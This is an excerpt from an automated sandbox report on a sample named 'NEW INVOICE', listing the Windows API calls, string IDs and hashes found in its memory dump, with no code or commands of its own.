                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                    • String ID:
                                                                                    • API String ID: 136442275-0
                                                                                    • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                    • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                    • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                    • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectRegistry_wcslen
                                                                                    • String ID: HH
                                                                                    • API String ID: 535477410-2761332787
                                                                                    • Opcode ID: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
                                                                                    • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                    • Opcode Fuzzy Hash: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
                                                                                    • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                    • _wcslen.LIBCMT ref: 00460502
                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                    • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                    • String ID: ThumbnailClass
                                                                                    • API String ID: 4123061591-1241985126
                                                                                    • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                    • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                    • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                    • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                    APIs
                                                                                      • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                      • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                      • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                      • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                    • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                    • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                    • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                    • ReleaseCapture.USER32 ref: 0046F589
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                    • API String ID: 2483343779-2060113733
                                                                                    • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                    • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                    • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                    • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                    APIs
                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                    • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                    • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                    • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                    • String ID: 2
                                                                                    • API String ID: 1331449709-450215437
                                                                                    • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                    • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                    • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                    • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: DestroyWindow
                                                                                    • String ID: static
                                                                                    • API String ID: 3375834691-2160076837
                                                                                    • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                    • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                                    • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                    • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                    • _memcmp.LIBCMT ref: 004394A9
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                    Strings
                                                                                    • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                    • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                    • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                    • API String ID: 1446985595-805462909
                                                                                    • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                    • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                    • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                    • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveType
                                                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                    • API String ID: 2907320926-41864084
                                                                                    • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                    • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                    • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                    • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                    APIs
                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                    • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                    • String ID:
                                                                                    • API String ID: 1932665248-0
                                                                                    • Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                    • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                    • Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                    • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                    • _memset.LIBCMT ref: 004481BA
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                    • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 830647256-0
                                                                                    • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                    • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                    • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                    • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                    APIs
                                                                                      • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                    • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                    • DeleteObject.GDI32(257316F7), ref: 0046EB4F
                                                                                    • DestroyIcon.USER32(08007F47), ref: 0046EB67
                                                                                    • DeleteObject.GDI32(00A71C50), ref: 0046EB7F
                                                                                    • DestroyWindow.USER32(00A76CA8), ref: 0046EB97
                                                                                    • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                    • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                    • String ID:
                                                                                    • API String ID: 802431696-0
                                                                                    • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                    • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                    • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                    • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                    • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                    • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                    • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                    • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                    • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                    • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                    • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                    • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HH
                                                                                    • API String ID: 0-2761332787
                                                                                    • Opcode ID: 7d4a86683db9a09c2256a2266118b3ebdc040ee5a517fddb499b320ca0848e6c
                                                                                    • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                                    • Opcode Fuzzy Hash: 7d4a86683db9a09c2256a2266118b3ebdc040ee5a517fddb499b320ca0848e6c
                                                                                    • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                    • _wcslen.LIBCMT ref: 00450944
                                                                                    • _wcscat.LIBCMT ref: 00450955
                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                                                    • String ID: -----$SysListView32
                                                                                    • API String ID: 4008455318-3975388722
                                                                                    • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                    • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
